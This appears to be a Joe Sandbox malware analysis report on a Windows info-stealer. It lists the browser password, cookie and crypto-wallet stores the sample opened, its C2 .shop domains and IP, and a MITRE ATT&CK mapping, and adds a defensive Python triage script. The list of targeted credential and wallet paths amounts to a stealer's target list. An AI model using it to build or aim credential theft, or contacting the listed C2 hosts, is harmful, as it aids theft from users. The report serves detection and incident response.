            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\Binance
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Directory queried: C:\Users\user\Documents
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Directory queried: C:\Users\user\Documents\DTBZGIOOSO
            Source: C:\Users\user\Desktop\o7b91j8vnJ.exe | Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
            Source: Yara match | File source: 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: o7b91j8vnJ.exe PID: 6856, type: MEMORYSTR
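The domain strings under HIPS / PFW / Operating System Protection Evasion and the long run of File opened events above are the part of this report an analyst actually copies out: the C2 hostnames, and the credential and wallet stores the process touched. The script below is an added example, not Joe Sandbox tooling: it parses signature lines in the form shown on this page, drops repeated events, and groups what remains into C2 domains, browser credential stores, extension storage directories and wallet directories. SAMPLE_LINES is a hand-picked subset of the lines above with the extraction's glued-on link text left in place; the artifact-to-meaning table and the wallet directory list are assumptions drawn from the paths this report shows, not from the sample's configuration.

```python
"""Group the signature lines of a sandbox report into a stealer triage summary.

Added example for this report page; not Joe Sandbox code. SAMPLE_LINES is a
hand-picked subset of the lines shown on the page, kept exactly as the page
extraction left them (source and description run together, link text glued on).
"""
import re

SAMPLE_LINES = r"""
Source: o7b91j8vnJ.exeString found in binary or memory: tolerateilusidjukl.shop
Source: o7b91j8vnJ.exeString found in binary or memory: productivelookewr.shop
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
Source: C:\Users\user\Desktop\o7b91j8vnJ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
""".strip().splitlines()

# Source and description may be glued together or separated by " | "; both forms parse.
LINE_RE = re.compile(
    r'^Source: (?P<source>.+?)\s*\|?\s*'
    r'(?P<kind>File opened|Directory queried|Key value queried|String found in binary or memory)'
    r': (?P<value>.+)$')
LINK_TEXT = 'Jump to behavior'       # link label the page extraction glued onto each event
DOMAIN_RE = re.compile(r'^(?:[a-z0-9-]+\.)+[a-z]{2,}$')

# Assumed meanings for the browser files this report shows being opened.
BROWSER_ARTIFACTS = {
    'Login Data': 'saved passwords (Chromium)',
    'Login Data For Account': 'saved passwords (Chromium, account-bound profile)',
    'Web Data': 'autofill and payment data (Chromium)',
    'History': 'browsing history',
    'Cookies': 'session cookies',
    'logins.json': 'saved passwords (Firefox, encrypted with the key4.db master key)',
    'key4.db': 'NSS key database (Firefox; needed to decrypt logins.json)',
    'cert9.db': 'NSS certificate store (Firefox)',
    'places.sqlite': 'history and bookmarks (Firefox)',
    'cookies.sqlite': 'session cookies (Firefox)',
    'formhistory.sqlite': 'form history (Firefox)',
    'prefs.js': 'profile preferences (Firefox)',
}
# Wallet application directories seen in this report's File opened events (assumed list).
WALLET_DIRS = ('Electrum', 'Exodus', 'Ledger Live', 'atomic', 'Coinomi', 'Bitcoin',
               'Binance', 'com.liberty.jaxx', 'Ethereum')


def browser_of(path):
    low = path.lower()
    if '\\google\\chrome\\' in low:
        return 'Chrome'
    if '\\microsoft\\edge\\' in low:
        return 'Edge'
    if '\\mozilla\\firefox\\' in low:
        return 'Firefox'
    return None


def wallet_app(path):
    padded = path.lower() + '\\'
    return next((w for w in WALLET_DIRS if '\\' + w.lower() + '\\' in padded), None)


def triage(lines):
    """Return a dict of C2 domains, browser artifacts, extension stores, wallets and leftovers."""
    report = {'c2_domains': [], 'browser_artifacts': [], 'extension_stores': [],
              'wallets': [], 'other': []}
    seen = set()
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        kind, value = m['kind'], m['value']
        if value.endswith(LINK_TEXT):
            value = value[:-len(LINK_TEXT)].strip()
        if (kind, value) in seen:            # the report lists every repeated open on its own line
            continue
        seen.add((kind, value))
        if kind == 'String found in binary or memory':
            if DOMAIN_RE.match(value):
                report['c2_domains'].append(value)
            continue
        if kind not in ('File opened', 'Directory queried'):
            report['other'].append((kind, value))
            continue
        base = value.rsplit('\\', 1)[-1]
        browser = browser_of(value)
        app = wallet_app(value)
        if browser and '\\local extension settings\\' in value.lower():
            report['extension_stores'].append((browser, base))   # base is the extension ID
        elif browser and base in BROWSER_ARTIFACTS:
            report['browser_artifacts'].append((browser, base, BROWSER_ARTIFACTS[base]))
        elif app:
            report['wallets'].append((app, value))
        else:
            report['other'].append((kind, value))
    return report


if __name__ == '__main__':
    for section, items in triage(SAMPLE_LINES).items():
        print(section)
        for item in items:
            print('   ', item)
```

The grouping is what turns 130 near-identical lines into the three facts that matter for response: which credential stores were read (so which passwords and session cookies to revoke), which extension IDs were targeted (so which wallet extensions' users to warn), and which hostnames to block or hunt for in proxy logs.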

            Remote Access Functionality

            Source: Yara match | File source: Process Memory Space: o7b91j8vnJ.exe PID: 6856, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK matrix (rebuilt from the report's flattened table). Each line is one tactic column; the digits in front of a technique are the badge the report shows in that cell, and techniques without a badge are the matrix's unmatched placeholders.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: [1] Windows Management Instrumentation; [1] PowerShell; At; Cron; Launchd; Scheduled Task
Persistence: [1] DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: [1] Process Injection; [1] DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: [11] Virtualization/Sandbox Evasion; [1] Process Injection; [11] Deobfuscate/Decode Files or Information; [3] Obfuscated Files or Information; [2] Software Packing; [1] DLL Side-Loading
Credential Access: [1] OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: [121] Security Software Discovery; [11] Virtualization/Sandbox Evasion; [2] Process Discovery; [1] File and Directory Discovery; [12] System Information Discovery; Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: [1] Archive Collected Data; [31] Data from Local System; [2] Clipboard Data; Input Capture; Keylogging; GUI Input Capture
Command and Control: [21] Encrypted Channel; [2] Non-Application Layer Protocol; [113] Application Layer Protocol; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Service Stop
Source | Detection | Scanner | Label
o7b91j8vnJ.exe | 43% | Virustotal | -
o7b91j8vnJ.exe | 100% | Avira | HEUR/AGEN.1312652
o7b91j8vnJ.exe | 100% | Joe Sandbox ML | -
Dropped files: No Antivirus matches
Unpacked PE files: No Antivirus matches
Source | Detection | Scanner | Label
strollheavengwu.shop | 1% | Virustotal | -
Source | Detection | Scanner | Label
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | 0% | URL Reputation | safe
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
https://support.microsof | 0% | URL Reputation | safe
http://crt.rootca1.amazontrust.com/rootca1.cer0? | 0% | URL Reputation | safe
https://strollheavengwu.shop/apime | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/apib2 | 0% | Avira URL Cloud | safe
shortsvelventysjo.shop | 0% | Avira URL Cloud | safe
tolerateilusidjukl.shop | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/y | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/apih02 | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/api | 100% | Avira URL Cloud | malware
tolerateilusidjukl.shop | 14% | Virustotal | -
shatterbreathepsw.shop | 0% | Avira URL Cloud | safe
shortsvelventysjo.shop | 16% | Virustotal | -
https://strollheavengwu.shop/apie | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/v | 0% | Avira URL Cloud | safe
demonstationfukewko.shop | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/apis | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/api | 11% | Virustotal | -
productivelookewr.shop | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/d | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/apie | 5% | Virustotal | -
demonstationfukewko.shop | 18% | Virustotal | -
https://strollheavengwu.shop/e | 0% | Avira URL Cloud | safe
alcojoldwograpciw.shop | 0% | Avira URL Cloud | safe
strollheavengwu.shop | 0% | Avira URL Cloud | safe
productivelookewr.shop | 16% | Virustotal | -
https://strollheavengwu.shop/9 | 0% | Avira URL Cloud | safe
shatterbreathepsw.shop | 17% | Virustotal | -
incredibleextedwj.shop | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/d | 10% | Virustotal | -
https://strollheavengwu.shop/apior | 0% | Avira URL Cloud | safe
alcojoldwograpciw.shop | 17% | Virustotal | -
https://strollheavengwu.shop/e | 10% | Virustotal | -
liabilitynighstjsko.shop | 0% | Avira URL Cloud | safe
incredibleextedwj.shop | 14% | Virustotal | -
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
strollheavengwu.shop | 1% | Virustotal | -
https://strollheavengwu.shop/7 | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/apiIF3 | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/ | 0% | Avira URL Cloud | safe
https://strollheavengwu.shop/apiN | 0% | Avira URL Cloud | safe
liabilitynighstjsko.shop | 17% | Virustotal | -
https://strollheavengwu.shop/ | 1% | Virustotal | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
strollheavengwu.shop | 172.67.163.209 | true | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
shortsvelventysjo.shop | true | 16% Virustotal; Avira URL Cloud: safe | unknown
tolerateilusidjukl.shop | true | 14% Virustotal; Avira URL Cloud: safe | unknown
https://strollheavengwu.shop/api | true | 11% Virustotal; Avira URL Cloud: malware | unknown
shatterbreathepsw.shop | true | 17% Virustotal; Avira URL Cloud: safe | unknown
demonstationfukewko.shop | true | 18% Virustotal; Avira URL Cloud: safe | unknown
productivelookewr.shop | true | 16% Virustotal; Avira URL Cloud: safe | unknown
strollheavengwu.shop | true | 1% Virustotal; Avira URL Cloud: safe | unknown
alcojoldwograpciw.shop | true | 17% Virustotal; Avira URL Cloud: safe | unknown
incredibleextedwj.shop | true | 14% Virustotal; Avira URL Cloud: safe | unknown
liabilitynighstjsko.shop | true | 17% Virustotal; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/y | o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/ac/?q= | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/apib2 | o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417. | o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/apime | o7b91j8vnJ.exe, 00000000.00000003.1649788363.00000000042E8000.00000004.00000020.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1649671760.00000000042CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://strollheavengwu.shop/apih02 | o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/apie | o7b91j8vnJ.exe, 00000000.00000003.1721593582.000000000434A000.00000004.00000020.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000002.1845373777.000000000434C000.00000004.00000020.00020000.00000000.sdmp | false | 5% Virustotal; Avira URL Cloud: safe | unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 | o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/v | o7b91j8vnJ.exe, 00000000.00000003.1668259812.0000000004326000.00000004.00000020.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1667240697.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://strollheavengwu.shop/apis | o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi | o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.c.lencr.org/0 | o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://x1.i.lencr.org/0 | o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/d | o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmp | false | 10% Virustotal; Avira URL Cloud: safe | unknown
https://strollheavengwu.shop/e | o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp | false | 10% Virustotal; Avira URL Cloud: safe | unknown
https://support.mozilla.org/products/firefoxgro.all | o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/9 | o7b91j8vnJ.exe, 00000000.00000002.1845085815.00000000042CC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg | o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/D | o7b91j8vnJ.exe, 00000000.00000003.1658773680.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://strollheavengwu.shop/apior | o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://upx.sf.net | Amcache.hve.3.dr | false | - | high
http://ocsp.rootca1.amazontrust.com0: | o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 | o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006880000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | o7b91j8vnJ.exe, 00000000.00000003.1669489845.0000000006940000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/7 | o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ac.ecosia.org/autocomplete?q= | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://support.microsof | o7b91j8vnJ.exe, 00000000.00000003.1649972995.0000000006882000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://strollheavengwu.shop/apiIF3 | o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crt.rootca1.amazontrust.com/rootca1.cer0? | o7b91j8vnJ.exe, 00000000.00000003.1668557197.0000000006842000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://strollheavengwu.shop/apiN | o7b91j8vnJ.exe, 00000000.00000003.1687894234.0000000004326000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | o7b91j8vnJ.exe, 00000000.00000003.1650364956.000000000686B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://strollheavengwu.shop/ | o7b91j8vnJ.exe, 00000000.00000003.1678045489.0000000004325000.00000004.00000020.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1687686767.0000000006830000.00000004.00000800.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1679141291.0000000006830000.00000004.00000800.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1658730673.000000000682F000.00000004.00000800.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1659021463.0000000006830000.00000004.00000800.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1679306292.0000000006830000.00000004.00000800.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1677973683.0000000006830000.00000004.00000800.00020000.00000000.sdmp; o7b91j8vnJ.exe, 00000000.00000003.1679474150.0000000006830000.00000004.00000800.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.163.209 | strollheavengwu.shop | United States | 13335 | CLOUDFLARENETUS | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1431408
Start date and time: 2024-04-25 01:59:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: o7b91j8vnJ.exe (renamed because the original name is a hash value)
Original Sample Name: 7b3e62bcbeed62a180220669f6a0c548.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 40
• Number of non-executed functions: 100
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29
